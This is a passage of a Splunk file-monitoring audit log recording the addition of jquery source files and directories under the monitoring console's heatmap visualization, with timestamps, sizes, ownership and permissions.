mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.195, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/support.js", isdir=0, size=631, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/stripAndCollapse.js", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.187, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/readyException.js", isdir=0, size=168, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.183, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/ready.js", isdir=0, size=2097, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.179, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/ready-no-deferred.js", isdir=0, size=2264, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.175, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/parseXML.js", isdir=0, size=559, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.170, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/parseHTML.js", isdir=0, size=1604, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.166, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/nodeName.js", isdir=0, size=178, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/isAttached.js", isdir=0, size=789, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/init.js", isdir=0, size=3337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.149, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/camelCase.js", isdir=0, size=546, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/access.js", isdir=0, size=1312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/DOMEval.js", isdir=0, size=1160, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deprecated/event.js", isdir=0, size=1139, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.923, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deprecated/ajax-event-alias.js", isdir=0, size=296, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data/var/dataUser.js", isdir=0, size=84, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data/var/dataPriv.js", isdir=0, size=84, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data/var/acceptData.js", isdir=0, size=318, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.899, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:04.895, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data/Data.js", isdir=0, size=3971, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/exports/global.js", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.885, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/exports/amd.js", isdir=0, size=1024, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.780, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/event/trigger.js", isdir=0, size=5435, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.777, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/event/support.js", isdir=0, size=133, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/event/focusin.js", isdir=0, size=1665, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/effects/animatedSelector.js", isdir=0, size=244, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/effects/Tween.js", isdir=0, size=3292, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes/val.js", isdir=0, size=4249, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes/support.js", isdir=0, size=786, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes/prop.js", isdir=0, size=3004, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.746, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes/classes.js", isdir=0, size=4447, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes/attr.js", isdir=0, size=3272, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.637, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/toString.js", isdir=0, size=104, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/support.js", isdir=0, size=117, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/slice.js", isdir=0, size=80, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/rnothtmlwhite.js", isdir=0, size=202, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/rcssNum.js", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/rcheckableType.js", isdir=0, size=79, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/push.js", isdir=0, size=79, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/pnum.js", isdir=0, size=100, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/isWindow.js", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.601, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/isFunction.js", isdir=0, size=428, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.595, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/indexOf.js", isdir=0, size=82, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/hasOwn.js", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/getProto.js", isdir=0, size=73, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.579, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/fnToString.js", isdir=0, size=92, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.575, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/flat.js", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/documentElement.js", isdir=0, size=105, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.565, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/document.js", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.561, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/class2type.js", isdir=0, size=82, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.557, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/arr.js", isdir=0, size=54, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var/ObjectFunctionString.js", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/swap.js", isdir=0, size=501, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/rnumnonpx.js", isdir=0, size=131, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.438, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/rboxStyle.js", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.434, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/isHiddenWithinTree.js", isdir=0, size=1284, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/getStyles.js", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var/cssExpand.js", isdir=0, size=88, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.321, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:04.317, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/support.js", isdir=0, size=4093, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.314, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/showHide.js", isdir=0, size=2304, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/hiddenVisibleSelectors.js", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/finalPropName.js", isdir=0, size=870, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.302, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/curCSS.js", isdir=0, size=1656, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/adjustCSS.js", isdir=0, size=2002, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.293, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css/addGetHookIf.js", isdir=0, size=530, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.189, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/queue/delay.js", isdir=0, size=636, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.183, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/var/rquery.js", isdir=0, size=60, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.178, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/var/nonce.js", isdir=0, size=72, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.173, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/var/location.js", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.169, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/xhr.js", isdir=0, size=4339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:04.158, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/script.js", isdir=0, size=1637, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.151, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/load.js", isdir=0, size=1904, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.147, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax/jsonp.js", isdir=0, size=2753, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.142, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deferred/exceptionHook.js", isdir=0, size=640, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.037, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/wrap.js", isdir=0, size=1477, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.032, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:04.028, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing.js", isdir=0, size=4692, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.022, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:04.018, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/serialize.js", isdir=0, size=3242, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/selector.js", isdir=0, size=66, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.007, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/selector-sizzle.js", isdir=0, size=411, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:04.002, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/selector-native.js", isdir=0, size=6459, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.998, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/queue.js", isdir=0, size=3091, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.993, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/queue", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.989, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/offset.js", isdir=0, size=6970, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.986, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation.js", isdir=0, size=12318, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.980, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.977, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/jquery.js", isdir=0, size=646, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/exports", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/event.js", isdir=0, size=24579, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/event", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.964, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/effects.js", isdir=0, size=17413, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.961, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/effects", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.957, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/dimensions.js", isdir=0, size=1751, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deprecated.js", isdir=0, size=2227, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.950, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deprecated", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.946, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deferred.js", isdir=0, size=10998, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/deferred", isdir=1, size=4096, gid=41812, uid=41812, 